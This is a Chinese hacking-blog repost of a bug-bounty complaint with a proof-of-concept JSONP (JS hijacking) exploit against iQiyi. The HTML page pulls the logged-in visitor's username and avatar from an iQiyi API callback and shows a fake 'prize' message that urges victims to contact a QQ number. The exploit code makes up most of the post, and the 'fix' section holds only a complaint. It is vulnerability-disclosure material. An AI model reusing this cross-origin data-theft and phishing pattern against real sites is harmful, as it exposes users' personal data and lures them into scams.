记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

js hijack抓取爱奇艺登录用户信息

2014-06-15 05:00
sobug审核人员素质根本不行。poc的意义只是在于证明这个漏洞。同样的漏洞我写过一个poc了,现在换一个url你就不认识了,那我能说什么,我只能说,那我就写一个poc给你看。
 
无心再扯淡,直接poc
 

<html>

<script src='http://api.t.iqiyi.com/qx_api/framework/all_in_one?data={%22requests%22:[{%22uri%22:%22/comment/get_user_simple_info%22

,%22params%22:{%22escape%22:true}}],%22publicParams%22:{%22tvid%22:186484,%22qitanid%22:1023533,%22aid%22:1023533,%22usecache%22:%22

true%22}}&qitancallback=fnsucc' >

</script>

<script>

document.write('亲爱的爱奇艺用户'+fnsucc.data['$comment$get_user_simple_info'].data.user.uname+'<br /><img src="'+fnsucc.data['$comm

ent$get_user_simple_info'].data.user.icon+'"></img><br />恭喜你的头像获得本年度最佳爱奇异啪啪奖,请你联系我们的客服(qq号 10001 )领

取啪啪奖');

</script>

</html>

 

修复方案:
是不是要我每次都写这么长一段poc代码,每次都把漏洞的应用场景替你们想好,你们才确认漏洞

知识来源: www.2cto.com/Article/201406/309085.html

阅读:98387 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“js hijack抓取爱奇艺登录用户信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词